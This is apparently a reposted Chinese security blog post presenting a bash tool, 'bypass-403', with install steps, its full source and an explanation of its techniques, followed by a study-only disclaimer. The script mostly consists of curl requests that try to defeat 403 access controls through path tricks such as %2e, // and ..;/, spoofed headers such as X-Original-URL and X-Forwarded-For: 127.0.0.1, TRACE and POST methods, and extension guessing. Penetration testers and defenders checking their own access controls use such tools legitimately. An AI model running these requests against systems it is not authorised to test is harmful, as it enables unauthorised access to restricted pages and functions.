用于尝试绕过 HTTP 状态码 403 Forbidden。脚本通过多种方式请求指定的 URL 和路径,以尝试发现应用程序中存在的漏洞或隐含的功能。
./bypass-403.sh https://example.com admin./bypass-403.sh website-here path-here
安装
git clone https://github.com/iamj0ker/bypass-403cd bypass-403chmod +x bypass-403.shsudo apt install figletsudo apt install jq
https://github.com/iamj0ker/bypass-403
#! /bin/bashfiglet Bypass-403echo " By Iam_J0ker"echo "./bypass-403.sh https://example.com path"echo " "curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/$2echo " --> ${1}/${2}"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/%2e/$2echo " --> ${1}/%2e/${2}"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/$2/.echo " --> ${1}/${2}/."curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1//$2//echo " --> ${1}//${2}//"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/./$2/./echo " --> ${1}/./${2}/./"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Original-URL: $2" $1/$2echo " --> ${1}/${2} -H X-Original-URL: ${2}"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Custom-IP-Authorization: 127.0.0.1" $1/$2echo " --> ${1}/${2} -H X-Custom-IP-Authorization: 127.0.0.1"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Forwarded-For: http://127.0.0.1" $1/$2echo " --> ${1}/${2} -H X-Forwarded-For: http://127.0.0.1"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Forwarded-For: 127.0.0.1:80" $1/$2echo " --> ${1}/${2} -H X-Forwarded-For: 127.0.0.1:80"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-rewrite-url: $2" $1echo " --> ${1} -H X-rewrite-url: ${2}"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/$2%20echo " --> ${1}/${2}%20"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/$2%09echo " --> ${1}/${2}%09"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/$2?echo " --> ${1}/${2}?"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/$2.htmlecho " --> ${1}/${2}.html"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/$2/?anythingecho " --> ${1}/${2}/?anything"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/$2#echo " --> ${1}/${2}#"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "Content-Length:0" -X POST $1/$2echo " --> ${1}/${2} -H Content-Length:0 -X POST"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/$2/*echo " --> ${1}/${2}/*"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/$2.phpecho " --> ${1}/${2}.php"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/$2.jsonecho " --> ${1}/${2}.json"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -X TRACE $1/$2echo " --> ${1}/${2} -X TRACE"curl -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Host: 127.0.0.1" $1/$2echo " --> ${1}/${2} -H X-Host: 127.0.0.1"curl -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$1/$2..;/"echo " --> ${1}/${2}..;/"curl -s -o /dev/null -iL -w "%{http_code}","%{size_download}" " $1/$2;/"echo " --> ${1}/${2};/"#updatedcurl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -X TRACE $1/$2echo " --> ${1}/${2} -X TRACE"echo "Way back machine:"curl -s https://archive.org/wayback/available?url=$1/$2 | jq -r '.archived_snapshots.closest | {available, url}'
具体来说,该脚本执行以下操作输出一些信息和说明;
-
使用 curl 命令请求指定的 URL 和路径,以尝试请求成功或者返回不同的状态码;
-
尝试使用多种方法对 URL 进行修改,例如添加 %2e 或者 %20 等特殊字符,以触发应用程序中的潜在漏洞或其他问题;
-
对 URL可能存在的文件后缀进行测试,例如 .html、.php 等;
-
尝试使用其他 HTTP 请求方法,例如 POST、TRACE 等;
-
尝试使用一些自定义的 HTTP 头部,例如 X-Original-URL、X-Custom-IP-Authorization、X-rewrite-url 等;
-
尝试使用 Wayback Machine 进行历史快照查询。
需要注意的是,该脚本仅供学习和研究之用,请勿用于非法或未授权的活动。在实际应用中,还需要进行更加细致和全面的安全测试,以确保应用程序的安全性和稳定性。
原文始发于微信公众号(Khan安全攻防实验室):Bypass-403
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论